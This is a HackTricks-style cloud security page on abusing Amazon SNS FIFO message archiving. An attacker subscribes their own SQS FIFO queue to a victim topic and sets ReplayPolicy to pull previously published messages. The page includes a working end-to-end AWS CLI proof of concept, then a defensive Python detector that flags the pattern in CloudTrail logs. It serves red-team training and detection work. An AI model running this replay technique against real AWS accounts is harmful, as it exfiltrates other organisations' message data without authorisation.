SNS FIFO Archive Replay Exfiltration via Attacker SQS FIFO Subscription

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Abuse message archiving on an Amazon SNS FIFO topic to replay and exfiltrate previously published messages to an attacker-controlled SQS FIFO queue by setting `ReplayPolicy` on the attacker's own subscription.

- Service: Amazon SNS (FIFO topics) + Amazon SQS (FIFO queues)
- Requirements: the topic must have `ArchivePolicy` (message archiving) enabled. The attacker can `Subscribe` to the topic and set attributes on the subscription they created. The attacker controls an SQS FIFO queue and allows the topic to send to it.
- Impact: historical messages (published before the subscription existed) are delivered to the attacker's endpoint. Replayed deliveries are marked with `Replayed=true` in the SNS envelope.

## Prerequisites

- SNS FIFO topic with archiving enabled: `ArchivePolicy` (e.g. `{ "MessageRetentionPeriod": "2" }` for 2 days of retention).
- The attacker has permissions for:
  - `sns:Subscribe` on the target topic.
  - `sns:SetSubscriptionAttributes` on the subscription they create.
- The attacker has an SQS FIFO queue and can attach a queue policy that allows the `sns.amazonaws.com` principal to call `sqs:SendMessage` with `aws:SourceArn` equal to the topic ARN.

## Minimal IAM permissions

- On the topic: `sns:Subscribe`.
- On the subscription: `sns:SetSubscriptionAttributes`.
- On the queue: `sqs:SetQueueAttributes` to attach the policy, plus a queue policy that allows `sqs:SendMessage` for `sns.amazonaws.com` conditioned on the topic ARN.

## Attack: replay archived messages to the attacker's SQS FIFO queue

The attacker subscribes their own SQS FIFO queue to the victim SNS FIFO topic, then sets `ReplayPolicy` to a timestamp in the past (within the archive retention window). SNS immediately replays the matching archived messages to the new subscription and marks them with `Replayed=true`.

Notes:

- The timestamp used in `ReplayPolicy` must be >= the topic's `BeginningArchiveTime`. If it is earlier, the API returns `Invalid StartingPoint value`.
- For SNS FIFO `Publish` you must specify `MessageGroupId` (and either `MessageDeduplicationId` or enable `ContentBasedDeduplication` on the topic).
<details>

<summary>End-to-end CLI POC (us-east-1)</summary>

```bash
REGION=us-east-1

# Compute a starting point; adjusted below to >= BeginningArchiveTime if needed
TS_START=$(python3 - << 'PY'
from datetime import datetime, timezone, timedelta
print((datetime.now(timezone.utc) - timedelta(minutes=15)).strftime('%Y-%m-%dT%H:%M:%SZ'))
PY
)

# 1) Create SNS FIFO topic with archiving (2-day retention)
TOPIC_NAME=htreplay$(date +%s).fifo
TOPIC_ARN=$(aws sns create-topic --region "$REGION" \
  --cli-input-json '{"Name":"'"$TOPIC_NAME"'","Attributes":{"FifoTopic":"true","ContentBasedDeduplication":"true","ArchivePolicy":"{\"MessageRetentionPeriod\":\"2\"}"}}' \
  --query TopicArn --output text)
echo "Topic: $TOPIC_ARN"

# 2) Publish a few messages BEFORE subscribing (FIFO requires MessageGroupId)
for i in $(seq 1 3); do
  aws sns publish --region "$REGION" --topic-arn "$TOPIC_ARN" \
    --message "{\"orderId\":$i,\"secret\":\"ssn-123-45-678$i\"}" \
    --message-group-id g1 >/dev/null
done

# 3) Create attacker SQS FIFO queue and allow only this topic to send
Q_URL=$(aws sqs create-queue --queue-name ht-replay-exfil-q-$(date +%s).fifo \
  --attributes FifoQueue=true --region "$REGION" --query QueueUrl --output text)
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region "$REGION" \
  --attribute-names QueueArn --query Attributes.QueueArn --output text)

cat > /tmp/ht-replay-sqs-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowSNSSend","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"sqs:SendMessage","Resource":"$Q_ARN","Condition":{"ArnEquals":{"aws:SourceArn":"$TOPIC_ARN"}}}]}
JSON

# Use CLI input JSON to avoid quoting issues (Q_URL must be exported so the python child can read it)
export Q_URL
aws sqs set-queue-attributes --region "$REGION" --cli-input-json "$(python3 - << 'PY'
import json, os
print(json.dumps({'QueueUrl': os.environ['Q_URL'], 'Attributes': {'Policy': open('/tmp/ht-replay-sqs-policy.json').read()}}))
PY
)"

# 4) Subscribe the queue to the topic
SUB_ARN=$(aws sns subscribe --region "$REGION" --topic-arn "$TOPIC_ARN" \
  --protocol sqs --notification-endpoint "$Q_ARN" --query SubscriptionArn --output text)
echo "Subscription: $SUB_ARN"

# 5) Ensure StartingPoint is >= BeginningArchiveTime
#    (with --output text the CLI prints "None" when the attribute is absent, so test for that too)
BEGIN=$(aws sns get-topic-attributes --region "$REGION" --topic-arn "$TOPIC_ARN" \
  --query Attributes.BeginningArchiveTime --output text)
START=${TS_START}
if [ -n "$BEGIN" ] && [ "$BEGIN" != "None" ]; then START="$BEGIN"; fi

aws sns set-subscription-attributes --region "$REGION" --subscription-arn "$SUB_ARN" \
  --attribute-name ReplayPolicy \
  --attribute-value "{\"PointType\":\"Timestamp\",\"StartingPoint\":\"$START\"}"

# 6) Receive replayed messages (note Replayed=true in the SNS envelope)
aws sqs receive-message --queue-url "$Q_URL" --region "$REGION" \
  --max-number-of-messages 10 --wait-time-seconds 10 \
  --message-attribute-names All --attribute-names All
```

</details>
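The two API calls the attack needs, `Subscribe` and `SetSubscriptionAttributes` with `AttributeName=ReplayPolicy`, are both control-plane calls that land in CloudTrail, which is where a defender will see it. The following is an added detection example written for this page, not code from HackTricks or from AWS: it is stdlib-only Python that scans CloudTrail records for a cross-account `Subscribe` (endpoint ARN in a different account than the topic) and for any `ReplayPolicy` change, rating the replay HIGH when the caller's account differs from the topic's account and MEDIUM when the owner did it. The three records are constructed inline and assume CloudTrail's usual shape for SNS (`requestParameters` as camelCase copies of the API parameters, `userIdentity.arn` for the caller); check those field names against a real trail before deploying it.

```python
"""Hunt CloudTrail for SNS FIFO archive-replay abuse (Subscribe, then ReplayPolicy).

Added example, stdlib only; not code from the page above. The sample records are
constructed to mirror the shape CloudTrail uses for SNS control-plane calls
(requestParameters = camelCase copies of the API parameters). Field names are an
assumption: confirm them against a real trail before relying on this.
"""
import json
from datetime import datetime, timezone

TOPIC = "arn:aws:sns:us-east-1:111111111111:orders.fifo"
SUB = TOPIC + ":4c1b0b3e-0000-4000-8000-000000000001"

# Constructed sample: account 999999999999 subscribes its own SQS FIFO queue,
# then points ReplayPolicy two days back into the archive. The third record is
# benign owner activity on another subscription and must not fire.
SAMPLE_RECORDS = [
    {
        "eventTime": "2024-05-01T10:00:00Z",
        "eventSource": "sns.amazonaws.com",
        "eventName": "Subscribe",
        "userIdentity": {"arn": "arn:aws:iam::999999999999:user/attacker"},
        "requestParameters": {
            "topicArn": TOPIC,
            "protocol": "sqs",
            "endpoint": "arn:aws:sqs:us-east-1:999999999999:exfil.fifo",
        },
    },
    {
        "eventTime": "2024-05-01T10:00:05Z",
        "eventSource": "sns.amazonaws.com",
        "eventName": "SetSubscriptionAttributes",
        "userIdentity": {"arn": "arn:aws:iam::999999999999:user/attacker"},
        "requestParameters": {
            "subscriptionArn": SUB,
            "attributeName": "ReplayPolicy",
            "attributeValue": json.dumps(
                {"PointType": "Timestamp", "StartingPoint": "2024-04-29T10:00:00Z"}
            ),
        },
    },
    {
        "eventTime": "2024-05-01T11:00:00Z",
        "eventSource": "sns.amazonaws.com",
        "eventName": "SetSubscriptionAttributes",
        "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/deployer/ci"},
        "requestParameters": {
            "subscriptionArn": TOPIC + ":aaaaaaaa-0000-4000-8000-000000000002",
            "attributeName": "RawMessageDelivery",
            "attributeValue": "true",
        },
    },
]


def arn_account(arn):
    """Account ID field of an ARN (arn:partition:service:region:account:resource), or ''."""
    parts = arn.split(":", 5)
    return parts[4] if len(parts) == 6 else ""


def parse_ts(value):
    """Parse the ISO-8601 Zulu timestamps used by CloudTrail eventTime and ReplayPolicy."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def analyze(records):
    """Return one finding dict per cross-account Subscribe and per ReplayPolicy change."""
    findings = []
    for rec in records:
        if rec.get("eventSource") != "sns.amazonaws.com":
            continue
        params = rec.get("requestParameters") or {}
        actor = (rec.get("userIdentity") or {}).get("arn", "")
        name = rec.get("eventName")

        if name == "Subscribe":
            topic_acct = arn_account(params.get("topicArn", ""))
            endpoint = params.get("endpoint", "")
            # Only ARN-shaped endpoints (sqs, lambda, firehose) carry an account ID.
            endpoint_acct = arn_account(endpoint) if endpoint.startswith("arn:") else ""
            if endpoint_acct and endpoint_acct != topic_acct:
                findings.append({"rule": "cross_account_subscribe", "severity": "HIGH",
                                 "actor": actor, "topic": params.get("topicArn"),
                                 "endpoint": endpoint})

        elif name == "SetSubscriptionAttributes" and params.get("attributeName") == "ReplayPolicy":
            try:
                policy = json.loads(params.get("attributeValue") or "{}")
            except json.JSONDecodeError:
                policy = {}
            sub_arn = params.get("subscriptionArn", "")
            lookback = None  # how far into the archive the replay reaches
            if policy.get("PointType") == "Timestamp" and policy.get("StartingPoint"):
                lookback = int((parse_ts(rec["eventTime"]) - parse_ts(policy["StartingPoint"])).total_seconds())
            # ReplayPolicy is a legitimate attribute: HIGH only for a caller outside the topic's account.
            severity = "HIGH" if arn_account(actor) != arn_account(sub_arn) else "MEDIUM"
            findings.append({"rule": "replay_policy_set", "severity": severity, "actor": actor,
                             "subscription": sub_arn, "starting_point": policy.get("StartingPoint"),
                             "lookback_seconds": lookback})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_RECORDS):
        print(json.dumps(finding))
```

Run it as-is to see the two findings from the constructed records, or feed it the `Records` array of real CloudTrail log files. The account comparison uses the subscription ARN rather than the topic ARN for the replay rule because `SetSubscriptionAttributes` only carries the subscription ARN, and the topic's account ID sits in the same ARN field.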

## Impact
**Potential impact**: An attacker who can subscribe to an SNS FIFO topic with archiving enabled and set `ReplayPolicy` on their own subscription can immediately replay and exfiltrate historical messages published to that topic, not only messages sent after the subscription was created. The reachable history is bounded by the topic's `ArchivePolicy` retention (`MessageRetentionPeriod`, in days) and its `BeginningArchiveTime`. Delivered messages carry the `Replayed=true` flag in the SNS envelope.
